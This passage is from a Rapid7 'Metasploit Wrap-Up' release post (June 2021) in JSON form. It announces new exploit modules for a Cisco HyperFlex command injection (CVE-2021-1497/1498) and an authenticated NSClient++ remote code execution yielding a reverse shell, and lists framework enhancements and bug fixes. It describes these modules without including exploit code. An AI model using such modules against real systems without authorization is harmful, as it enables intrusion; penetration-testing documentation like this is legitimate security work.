Klyuchnikov, and Nikita Abramov, which exploits [CVE-2021-1498](<https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498?referrer=blog>) \\- Added an exploit for [CVE-2021-1497](<https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497?referrer=msfReleaseNotes>)/[CVE-2021-1498](<https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498?referrer=msfReleaseNotes>), a command injection in Cisco HyperFlex HX Data Platform.\n * [NSClient++ 0.5.2.35 - ExternalScripts Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15305>) by [Yann Castel](<https://github.com/Hakyac>) and kindredsec - This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privilege reverse shell, so long as the attacker has the admin password, and the NSClient++has both the web interface and ExternalScripts feature enabled.\n\n## Enhancements and features\n\n * [#15296](<https://github.com/rapid7/metasploit-framework/pull/15296>) from [pingport80](<https://github.com/pingport80>) \\- The `command_exists?` method inside `post/common.rb` has been updated to fall back to using the `which` command to check if a command exists on a target system if `command -v` fails to run successfully. This allows users to check whether a command exists or not on systems that might not contain a `command` command, such as ESXi.\n * [#15299](<https://github.com/rapid7/metasploit-framework/pull/15299>) from [todb-r7](<https://github.com/todb-r7>) \\- The CONTRIBUTING.md documentation has been updated to include additional information on how to request CVEs for vulnerabilities from Rapid7.\n\n## Bugs fixed\n\n * [#15257](<https://github.com/rapid7/metasploit-framework/pull/15257>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The ` lib/msf/core/post_mixin.rb` library has been updated to correctly check if missing Meterpreter command IDs are core command IDs or an extension command ID and provide appropriate feedback to end users about this incompatibility. This also fixes an issue where Meterpreter might complain that it couldn't load an extension but wouldn't display what the extension was.\n * [#15284](<https://github.com/rapid7/metasploit-framework/pull/15284>) from [pingport80](<https://github.com/pingport80>) \\- This fixes a localization-related issue in the `post/linux/gather/pptpd_chap_secrets` module. If the file is unreadable, Metasploit would treat the permission denied error as the contents.\n * [#15290](<https://github.com/rapid7/metasploit-framework/pull/15290>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Invalid Meterpeter command requirements in mixins no longer raise a Runtime error.\n * [#15293](<https://github.com/rapid7/metasploit-framework/pull/15293>) from [smashery](<https://github.com/smashery>) \\- This fixes two bugs in the Redis extractor module. The first was an issue that would occur when a value was excessively large. The second was a race condition that could be encountered if the server was being actively used by a third-party.\n * [#15312](<https://github.com/rapid7/metasploit-framework/pull/15312>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Ensures that msfconsole now supports setting both `RHOST` and `RHOSTS` interchangeably for all scenarios and modules\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.47...6.0.48](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-06-03T10%3A14%3A41-05%3A00..2021-06-10T14%3A21%3A04%2B01%3A00%22>)\n * [Full diff 6.0.47...6.0.48](<https://github.com/rapid7/metasploit-framework/compare/6.0.47...6.0.48>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-06-11T19:51:35", "published": "2021-06-11T19:51:35", "id": "RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128", "href": "https://blog.rapid7.com/2021/06/11/metasploit-wrap-up-116/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
